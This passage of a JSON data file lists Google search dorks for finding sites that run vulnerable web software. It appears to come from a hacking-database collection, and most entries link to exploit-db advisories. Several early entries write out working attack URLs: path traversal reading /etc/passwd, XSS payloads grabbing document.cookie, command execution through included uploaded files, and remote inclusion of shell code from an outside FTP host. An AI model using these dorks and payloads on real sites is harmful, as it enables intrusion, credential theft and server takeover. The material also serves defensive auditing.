dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit:http://rgod.altervista.org/sugar_suite_40beta.html"}, {"dork": "\"Powered By phpCOIN 1.2.2\"", "description": "PhpCOIN 1.2.2 arbitrary remote\\local inclusion / blind sql injection / path disclosureadvisory:http://rgod.altervista.org/phpcoin122.htmlmore generic:\"Powered By phpCOIN\"to see previous verions (not tested)"}, {"dork": "intext:\"Powered by SimpleBBS v1.1\"*", "description": "Vulnerability DescriptionSimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.Solution DescriptionCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.Products:* SimpleMedia SimpleBBS 1.1 AffectedVulnerability classification:* Remote vulnerability* Input manipulation attack* Impact on integrity* Exploit unavailable* VerifiedMore info on Vuln: http://www.securityfocus.com/bid/15594"}, {"dork": "(intitle:\"metaframe XP Login\")|(intitle:\"metaframe Presentation server Login\")", "description": "Once you input any username, you'll get an error message. Try putting a script with some other fun commands in it. Just send some info off to be logged.If exploited correctly, could give you admin access to a network."}, {"dork": "\"index of\" intext:fckeditor inurl:fckeditor", "description": "\"index of\" intext:fckeditor inurl:fckeditor this dork is for FCKEditor scriptthrough editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands... however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html"}, {"dork": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "description": "dork: (\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis software: http://nocc.sourceforge.net/ this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss & possible remote code execution flaws I found: example of arbitrary local inclusion: http://[target]/[path]/html/footer.php?cmd=dir&_SESSION[nocc_theme]=../../../../../../../../../test.php%00 http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=fr&theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test example of commands execution (including an uploaded mail attachment with php code inside, filename is predictable...) http://[target]/[path]/index.php?cmd=dir&lang=../tmp/php331.tmp1140514888.att%00 xss: http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=\">alert(document.cookie) full advisory & poc exploit: http://retrogod.altervista.org/noccw_10_incl_xpl.html"}, {"dork": "intitle:\"igenus webmail login\"", "description": "intitle:\"igenus webmail login\"example exploit: http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 also, on php5: http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:password@somehost.com&cmd=dir where on somehost.com you have a php shell code in a \".config\" file exploit code: http://retrogod.altervista.org/igenus_202_xpl_pl.html"}, {"dork": "intext:\"Powered By Geeklog\" -geeklog.net", "description": "dork: intext:\"Powered By Geeklog\" -geeklog.net this is for the vulnerability discovered by GulfTech research, related stuff: (*) http://www.gulftech.org/?node=research&article_id=00102-02192006 http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 exploit for (*) : http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)"}, {"dork": "intitle:admbook intitle:version filetype:php", "description": "intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.phpperl exploit:http://retrogod.altervista.org/admbook_122_xpl.html"}, {"dork": "WEBalbum 2004-2006 duda -ihackstuff -exploit", "description": "dork: WEBalbum 2004-2006 duda -ihackstuff -exploitsoftware site: http://www.web-album.org/ advisory/ poc exploit: http://retrogod.altervista.org/webalbum_202pl_local_xpl.html"}, {"dork": "inurl:*.exe ext:exe inurl:/*cgi*/", "description": "a cgi-bin executables xss/html injection miscellanea:some examples:inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=\">[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=\">[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=\">[XSS HERE]&poi1city=city&poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=\">[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=\">[XSS HERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=\">[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=\">[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=\">[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=\">[XSS HERE]&LIMIT=50&YEAR=\"> inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=\">[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]"}, {"dork": "inurl:server.php ext:php intext:\"No SQL\" -Released", "description": "vulnerabilitydiscovered by Secunia, quick reference:http://www.securityfocus.com/bid/16187an example of exploit for PHPOpenChat:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmla DOS exploit:http://retrogod.altervista.org/adodb_dos.html"}, {"dork": "intitle:PHPOpenChat inurl:\"index.php?language=\"", "description": "exploit:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmlalso, information disclosure:http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfoand denial of service on some windows system, multiple requests of:http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog"}, {"dork": "inurl:\"extras/update.php\" intext:mysql.php -display", "description": "this is an osCommerce dork:inurl:\"extras/update.php\" intext:mysql.php -display or more simply: inurl:\"extras/update.php\" -display (this display some more hosts where error_reporting=0) I found this simple exploit, if extras/ folder is inside the www path, you can view all files on target system, including php files and so on, ex: http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=../index.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/fstab also, if you succeed to view configure script with database details, you can connect to it trough some test scripts inside this folder...now I read this:http://www.securityfocus.com/bid/14294/infothis is actually unpatched/unresolved in 2.2 on Apr 2006"}, {"dork": "inurl:sysinfo.cgi ext:cgi", "description": "dork:inurl:sysinfo.cgi ext:cgi exploit: http://www.milw0rm.com/exploits/1677 I found this command execution vulnerability in 1.2.1 but other versions maybe vulnerable toohowever, u can see version in google results"}, {"dork": "inurl:perldiver.cgi ext:cgi", "description": "dork: inurl:perldiver.cgi ext:cgi some interesting info about server and a cross site scripting vulnerability, poc: http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&alert(\"lol\")other reference:http://secunia.com/advisories/16888/"}, {"dork": "inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk", "description": "dork:inurl:tmssql.php ext:php mssql pear adodb -cvs -akbka remote user can execute an arbitrary function (without arguments) example: http://[target]/[path]/tmssql.php?do=phpinfo reference:http://www.osvdb.org/displayvuln.php?osvdb_id=22291 I also discovered that you can crash some win boxes / apache servers by sendingmultiple requests of http://[target]/[path]/tmssql.php?do=closelogsee:http://www.milw0rm.com/exploits/1651"}, {"dork": "\"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje", "description": "dork: \"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje poc: if register_globals = On & magic_quotes_gpc = Off http://[target]/[path]/language.php?data_dir=/etc/passwd%00 on, php5, if register_globals = on: http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:fakemail.com@somehost.com/public/ where on ftp you have a translation.dat file with shellcode inside references: http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html http://www.securityfocus.com/bid/17526"}, {"dork": "\"powered by active php bookmarks\" | inurl:bookmarks/view_group.php?id=", "description": "Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.exploit (i haven't tested it)http://www.securityfocus.com/archive/1/305392my version of exploithttp://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps"}, {"dork": "inurl:resetcore.php ext:php", "description": "e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development.rgods exploit:http://retrogod.altervista.org/e107remote.html"}, {"dork": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "description": "found this: a remote user can have access to some edit functionalities to \"modify\" html. Impact: cross site scripting, denial of service references:http://retrogod.altervista.org/phpgraphy_0911_adv.htmlhttp://secunia.com/advisories/19705"}, {"dork": "intext:\"Powered by PCPIN.com\" -site:pcpin.com -ihackstuff -\"works with\" -findlaw", "description": "this is for PCPIN Chat SQL injection/login bypass and arbitrary local inclusion references:http://retrogod.altervista.org/pcpin_504_xpl.htmlhttp://secunia.com/advisories/19708/"}, {"dork": "inurl:wp-login.php +Register Username Password \"remember me\" -echo -trac -footwear", "description": "this is a bit different from the previous one in GHDB, it searches for Wordpress 2.x sites where user registration is enabled, a user can inject a carriage return and php code inside cache files to have a shell on target systemadvisory & poc exploit here: http://retrogod.altervista.org/wordpress_202_xpl.html"}, {"dork": "\"powered by ubbthreads\"", "description": "forums powered by ubbthreads are vulnerable to file inclusion.You can get more results with yahoo search.http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt?http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded"}, {"dork": "\"powered by minibb forum software\"", "description": "This dork is for minibb forum software arbitrary remote inclusion. this is about the unset() issue found by S. Esser: http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html Try this c codes to calculate hashes if you wanna test the unset() vuln on some other app: http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=3944"}, {"dork": "inurl:eStore/index.cgi?", "description": "this is for eStore directory traversal, example exploit:http://[target]/[path]/eStore/index.cgi?page=../../../../../../../../etc/passwd"}, {"dork": "allinurl:com_pccookbook", "description": "Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability - CVE: 2008-0844: https://www.exploit-db.com/exploits/5145"}, {"dork": "inurl:\"section.php?name=singers\"", "description": "6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability - CVE: 2008-6453: https://www.exploit-db.com/exploits/6520"}, {"dork": "Powered by v1.14 powered by philboard v1.14", "description": "W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5192: https://www.exploit-db.com/exploits/5958"}, {"dork": "inurl:index.php%\"Submit%Articles\"%\"Member%Login\"%\"Top%Authors\"", "description": "Article Directory (index.php page) Remote File Inclusion Vulnerability - CVE: 2007-4007: https://www.exploit-db.com/exploits/4221"}, {"dork": "allinurl: \"wordspew-rss.php\"", "description": "Wordpress Plugin Wordspew Remote SQL Injection Vulnerability - CVE: 2008-0682: https://www.exploit-db.com/exploits/5039"}, {"dork": "allinurl: com_clasifier", "description": "Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability - CVE: 2008-0842: https://www.exploit-db.com/exploits/5146"}, {"dork": "allinurl: \"com_galeria\"", "description": "Joomla Component com_galeria Remote SQL Injection Vulnerability - CVE: 2008-0833: https://www.exploit-db.com/exploits/5134"}, {"dork": "Powered by hwdVideoShare", "description": "Joomla Component com_hwdvideoshare SQL Injection Vulnerability - CVE: 2008-0916: https://www.exploit-db.com/exploits/5160"}, {"dork": "allinurl: modules-php-name-Siir", "description": "PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5169"}, {"dork": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"\r\n\r\n\r\n\r\nor refined\r\n\r\n\r\n\r\ninurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"\r\n\r\n\r\n\r\nVarious \"tinybrowser\" vulnerabilities: \r\n\r\nhttps://www.exploit-db.com/exploits/9296/\r\n\r\n\r\n\r\nDigiP"}, {"dork": "allinurl: \"modules/wfdownloads/viewcat.php?cid\"", "description": "XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5218"}, {"dork": "allinurl: \"modules/eEmpregos/index.php\"", "description": "XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability - CVE: 2008-0874: https://www.exploit-db.com/exploits/5157"}, {"dork": "Powered by Active PHP Bookmarks v1.1.02", "description": "Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability - CVE: 2008-3748: https://www.exploit-db.com/exploits/6277"}, {"dork": "powered by Site Sift", "description": "Site Sift Listings (id) Remote SQL Injection Vulnerability - CVE: 2008-1869: https://www.exploit-db.com/exploits/5383"}, {"dork": "\"Create your own free webring and bring traffic to your website. Join now, it's free!\"", "description": "Prozilla Webring Website Script (category.php cat) Remote SQL Injection - CVE: 2007-4362: https://www.exploit-db.com/exploits/4284"}, {"dork": "inurl:com_joomladate", "description": "Joomla Component JoomlaDate (user) SQL injection Vulnerability - CVE: 2008-6068: https://www.exploit-db.com/exploits/5748"}, {"dork": "\"powered by ILIAS\"", "description": "ILIAS 3.7.4 (ref_id) Blind SQL Injection Vulnerability - CVE: 2008-5816: https://www.exploit-db.com/exploits/7570"}, {"dork": "allinurl: \"index.php?option=com_doc\"", "description": "Joomla Component com_doc Remote SQL Injection Vulnerability - CVE: 2008-0772: https://www.exploit-db.com/exploits/5080"}, {"dork": "Powered by GL-SH DEAF forum 6.5.5 final.", "description": "PHP Forum ohne My SQL Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10757"}, {"dork": "inurl:com_simpleshop", "description": "Joomla Component simpleshop 3.4 SQL injection Vulnerability - CVE: 2008-2568: https://www.exploit-db.com/exploits/5743"}, {"dork": "inurl:\"index.php?pageid=\" Property Listings", "description": "Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility - CVE: 2007-3810: https://www.exploit-db.com/exploits/4184"}, {"dork": "\"Powered by Smoothflash\"", "description": "Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability - CVE: 2008-1623: https://www.exploit-db.com/exploits/5322"}, {"dork": "display_blog.php", "description": "Social Site Generator (sgc_id) Remote SQL Injection Vulnerability - CVE: 2008-6419: https://www.exploit-db.com/exploits/5701"}, {"dork": "Snipe Gallery v.3.1.5 by Snipe.Net", "description": "snipe gallery Script Sql Injection: https://www.exploit-db.com/exploits/14053"}, {"dork": "Powered by AspDownload", "description": "ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability - CVE: 2008-6739: https://www.exploit-db.com/exploits/5780"}, {"dork": "DA Mailing List System V2 Powered by DigitalArakan.Net", "description": "DA Mailing List System V2 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11348"}, {"dork": "Powered By AJ Auction Web", "description": "AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability - CVE: 2008-2860: https://www.exploit-db.com/exploits/5867"}, {"dork": "''showad.php?listingid=''", "description": "BM Classifieds 20080409 Multiple SQL Injection Vulnerabilities - CVE: 2008-1272: https://www.exploit-db.com/exploits/5223"}, {"dork": "\"Powered by My PHP Indexer 1.0\"", "description": "My PHP Indexer 1.0 (index.php) Local File Download Vulnerability - CVE: 2008-6183: https://www.exploit-db.com/exploits/6740"}, {"dork": "allinurl: \"com_rapidrecipe\"user_id", "description": "Joomla Component rapidrecipe 1.6.5 SQL Injection Vulnerability - CVE: 2008-0754: https://www.exploit-db.com/exploits/5103"}, {"dork": "allinurl: \"modules/dictionary\"", "description": "XOOPS Module Dictionary 0.94 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5267"}, {"dork": "\"RS MAXSOFT\"", "description": "RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability - CVE: 2008-4912: https://www.exploit-db.com/exploits/5426"}, {"dork": "\"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5\"", "description": "Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability - CVE: 2009-4096: https://www.exploit-db.com/exploits/10231"}, {"dork": "allinurl: \"index.php?p=poll\"showresult", "description": "Koobi Pro 6.25 poll Remote SQL Injection Vulnerability - CVE: 2008-2036: https://www.exploit-db.com/exploits/5448"}, {"dork": "allinurl: \"com_joovideo\" detail", "description": "Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability - CVE: 2008-1460: https://www.exploit-db.com/exploits/5277"}, {"dork": "content_by_cat.asp?contentid ''catid''", "description": "ASPapp Knowledge Base Remote SQL Injection Vulnerability - CVE: 2008-1430: https://www.exploit-db.com/exploits/5286"}, {"dork": "Powered By AlstraSoft Video Share Enterprise", "description": "AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability - CVE: 2008-3386: https://www.exploit-db.com/exploits/6092"}, {"dork": "\"Powered by PG Real Estate Solution - real estate web site design\"", "description": "PG Real Estate (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5306: https://www.exploit-db.com/exploits/7200"}, {"dork": "\"Powered by PG Roomate Finder Solution - roommate estate web site design\"", "description": "PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5307: https://www.exploit-db.com/exploits/7201"}, {"dork": "allinurl: com_pcchess \"user_id\"", "description": "Joomla Component pcchess 0.8 Remote SQL Injection Vulnerability - CVE: 2008-0761: https://www.exploit-db.com/exploits/5104"}, {"dork": "Powered by PHP upload - unijimpe.", "description": "PHP upload - (unijimpe) Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10732"}, {"dork": "\"Powered by FubarForum v1.6\"", "description": "FubarForum 1.6 Arbitrary Admin Bypass Vulnerability: https://www.exploit-db.com/exploits/7595"}, {"dork": "inurl:cfaq/index.php?catid=", "description": "FAQ Management Script (catid) Remote SQL Injection Vulnerability - CVE: 2008-4743: https://www.exploit-db.com/exploits/6629"}, {"dork": "''name Kose_Yazilari op viewarticle artid''", "description": "PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability - CVE: 2008-1053: https://www.exploit-db.com/exploits/5186"}, {"dork": "inurl: modifyform.html?code=", "description": "modifyform (modifyform.html) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4423"}, {"dork": "allinurl: com_ricette", "description": "Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability - CVE: 2008-0841: https://www.exploit-db.com/exploits/5133"}, {"dork": "out.php?linkid=1", "description": "Link ADS 1 (out.php linkid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5930"}, {"dork": "\" ActiveKB v1.5 Copyright \u00c2\u00a9\"", "description": "ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access - CVE: 2008-2338: https://www.exploit-db.com/exploits/5616/"}, {"dork": "allinurl:\"com_garyscookbook\"", "description": "Mambo Component garyscookbook 1.1.1 SQL Injection Vulnerability - CVE: 2008-1137: https://www.exploit-db.com/exploits/5178"}, {"dork": "inurl:\"index.php?conteudo=\"", "description": "Waibrasil Remote / Local File Inclusion: https://www.exploit-db.com/exploits/12562"}, {"dork": "inurl:\"section.php?name=singers\"", "description": "6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability - CVE: 2008-6454: https://www.exploit-db.com/exploits/6511"}, {"dork": "inurl:cat1.php?catID= \"Spaceacre\"", "description": "Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability: https://www.exploit-db.com/exploits/12756"}, {"dork": "\"Powered by FubarForum v1.6\"", "description": "FubarForum 1.6 Admin Bypass Change User Password Vulnerability: https://www.exploit-db.com/exploits/7606"}, {"dork": "intext:\u00c2\u00a92003-2008 RC v3.1 Developed by: GA Soft", "description": "Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability - CVE: 2008-6388: https://www.exploit-db.com/exploits/7324"}, {"dork": "details.php?p_id=", "description": "The iceberg 'Content Management System' SQL Injection Vulnerability - CVE: 2010-2016: https://www.exploit-db.com/exploits/12620"}, {"dork": "allinurl:\"modules/photo/viewcat.php?id\"", "description": "RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability - CVE: 2008-1551: https://www.exploit-db.com/exploits/5290"}, {"dork": "powered by 35mm Slide Gallery", "description": "35mm Slide Gallery Directory Traversal Vulnerability: https://www.exploit-db.com/exploits/10614"}, {"dork": "allinurl:\"com_simpleshop\"", "description": "Joomla Component simple shop 2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5177"}, {"dork": "powered by vBulletin 3.8.4", "description": "vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability: https://www.exploit-db.com/exploits/14833"}, {"dork": "intitle:Web Calendar system v 3.30 inurl:.asp", "description": "Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities - CVE: 2004-1552: https://www.exploit-db.com/exploits/7242"}, {"dork": "inurl:index.php?page=en_jobseekers", "description": "JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability - CVE: 2007-5785: https://www.exploit-db.com/exploits/4576"}, {"dork": "webwizguestbook_license.asp", "description": "Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability - CVE: 2003-1571: https://www.exploit-db.com/exploits/7488"}, {"dork": "allinurl: aid \"com_xfaq\"", "description": "Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability - CVE: 2008-0795: https://www.exploit-db.com/exploits/5109"}, {"dork": "inurl:modules/flashgames/", "description": "XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability - CVE: 2007-2543: https://www.exploit-db.com/exploits/3849"}, {"dork": "inurl:index.php?option=com_mediaslide", "description": "Joomla Component com_mediaslide Directory Traversal Vulnerability: https://www.exploit-db.com/exploits/10591"}, {"dork": "inurl:\"com_biblestudy\"", "description": "Joomla Component com_biblestudy LFI Vulnerability - CVE: 2010-0157: https://www.exploit-db.com/exploits/10943"}, {"dork": "inurl:\"com_dashboard\"", "description": "Joomla Component com_dashboard Directory Traversal: https://www.exploit-db.com/exploits/11086"}, {"dork": "inurl:\"com_jcollection \"", "description": "Joomla Component com_jcollection Directory Traversal - CVE: 2010-0944: https://www.exploit-db.com/exploits/11088"}, {"dork": "\"Affiliate Network Pro\"", "description": "AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability - CVE: 2008-3240: https://www.exploit-db.com/exploits/6087"}, {"dork": "index.php?option=com_pcchess", "description": "PrinceClan Chess Mambo Com 0.8 Remote Inclusion Vulnerability - CVE: 2006-5044: https://www.exploit-db.com/exploits/2069"}, {"dork": "Powered By: Forest Blog v1.3.2", "description": "Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability - CVE: 2008-5780: https://www.exploit-db.com/exploits/7466"}, {"dork": "intext:\"Powered by phpFastNews\"", "description": "phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability - CVE: 2008-4622: https://www.exploit-db.com/exploits/6779"}, {"dork": "Powered by phpDatingClub", "description": "phpDatingClub (website.php page) Local File Inclusion Vulnerability - CVE: 2008-3179: https://www.exploit-db.com/exploits/6037"}, {"dork": "\"Powered by: Censura\"", "description": "Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability - CVE: 2007-2673: https://www.exploit-db.com/exploits/3843"}, {"dork": "inurl:com_clanlist", "description": "Joomla Component (com_clanlist) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15456"}, {"dork": "\"This script created by www.script.canavari.com\"", "description": "Basic Forum 1.1 (edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6193: https://www.exploit-db.com/exploits/2848"}, {"dork": "inurl:classified/product_desc.php?id=", "description": "GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability - CVE: 2008-3585: https://www.exploit-db.com/exploits/6189"}, {"dork": "allinurl:\"members.asp?action\"", "description": "MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5187"}, {"dork": "inurl:btg_oglas", "description": "Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability: https://www.exploit-db.com/exploits/15468"}, {"dork": "Powered by lineaCMS \u00a9 2006 lineaPHP Group", "description": "lineaCMS Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/10736"}, {"dork": "\"Powered by Scripteen Free Image Hosting Script V 2.3\"", "description": "Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln - CVE: 2009-4987: https://www.exploit-db.com/exploits/9256"}, {"dork": "inurl:\"com_jvideodirect \"", "description": "Joomla Component com_jvideodirect Directory Traversal - CVE: 2010-0942: https://www.exploit-db.com/exploits/11089"}, {"dork": "\"Siteman Version 1.1.9\"", "description": "Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability - CVE: 2008-0452: https://www.exploit-db.com/exploits/4973"}, {"dork": "\"SimpleBlog 2.3 by 8pixel.net\"", "description": "SimpleBlog 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6191: https://www.exploit-db.com/exploits/2853"}, {"dork": "inurl:/squirrelcart/", "description": "Squirrelcart 2.2.0 (cart_content.php) Remote Inclusion Vulnerability - CVE: 2006-2483: https://www.exploit-db.com/exploits/1790"}, {"dork": "inurl:com_markt", "description": "Joomla Component (com_markt) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15469"}, {"dork": "\"powered by EQdkp\"", "description": "EQdkp 1.3.0 (dbal.php) Remote File Inclusion Vulnerability - CVE: 2006-2256: https://www.exploit-db.com/exploits/1764"}, {"dork": "intitle:\"Login to Calendar\"", "description": "ACal 2.2.6 (day.php) Remote File Inclusion Vulnerability - CVE: 2006-2261: https://www.exploit-db.com/exploits/1763"}, {"dork": "\"WebCalendar v1.0.4\"", "description": "WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability - CVE: 2008-2836: https://www.exploit-db.com/exploits/5847"}, {"dork": "inurl:\"com_bfsurvey\"", "description": "Joomla Component com_bfsurvey LFI Vulnerability - CVE: 2010-2259: https://www.exploit-db.com/exploits/10946"}, {"dork": "anyInventory, the most flexible and powerful web-based inventory system", "description": "AnyInventory 2.0 (environment.php) Remote File Inclusion Vuln - CVE: 2007-4744: https://www.exploit-db.com/exploits/4365"}, {"dork": "inurl:bemarket", "description": "BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability - CVE: 2007-3934: https://www.exploit-db.com/exploits/4195"}, {"dork": "inurl:\"com_jashowcase \"", "description": "Joomla Component com_jashowcase Directory Traversal - CVE: 2010-0943: https://www.exploit-db.com/exploits/11090"}, {"dork": "Powered by React - www.react.nl", "description": "React software [local file inclusion]: https://www.exploit-db.com/exploits/11943"}, {"dork": "\"qjForum\"", "description": "qjForum (member.asp) SQL Injection Vulnerability - CVE: 2006-2638: https://www.exploit-db.com/exploits/1833"}, {"dork": "\"Powered by cifshanghai.com\"", "description": "Cifshanghai (chanpin_info.php) CMS SQL Injection: https://www.exploit-db.com/exploits/10105"}, {"dork": "allinurl:\"detResolucion.php?tipodoc_id=\"", "description": "CMS Ariadna 2009 SQL Injection - OSVDB-ID: 63929: https://www.exploit-db.com/exploits/12301"}, {"dork": "\"Powered By : Yamamah Version 1.00\"", "description": "Yamamah Photo Gallery 1.00 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13857"}, {"dork": "Powered by osCSS", "description": "osCSS v1.2.1 Database Backups Disclosure: https://www.exploit-db.com/exploits/11612"}, {"dork": "inurl:\"index.php?option=com_prime\"", "description": "Joomla Component com_prime Directory Traversal: https://www.exploit-db.com/exploits/11177"}, {"dork": "\"2006 by www.mani-stats-reader.de.vu\"", "description": "Mani Stats Reader 1.2 (ipath) Remote File Include Vulnerability - CVE: 2007-1299: https://www.exploit-db.com/exploits/3398"}, {"dork": "\"powered by: WebLeague\"", "description": "webLeague 2.2.0 (install.php) Remote Change Password: https://www.exploit-db.com/exploits/9164"}, {"dork": "\"All Rights Reserved. Powered by 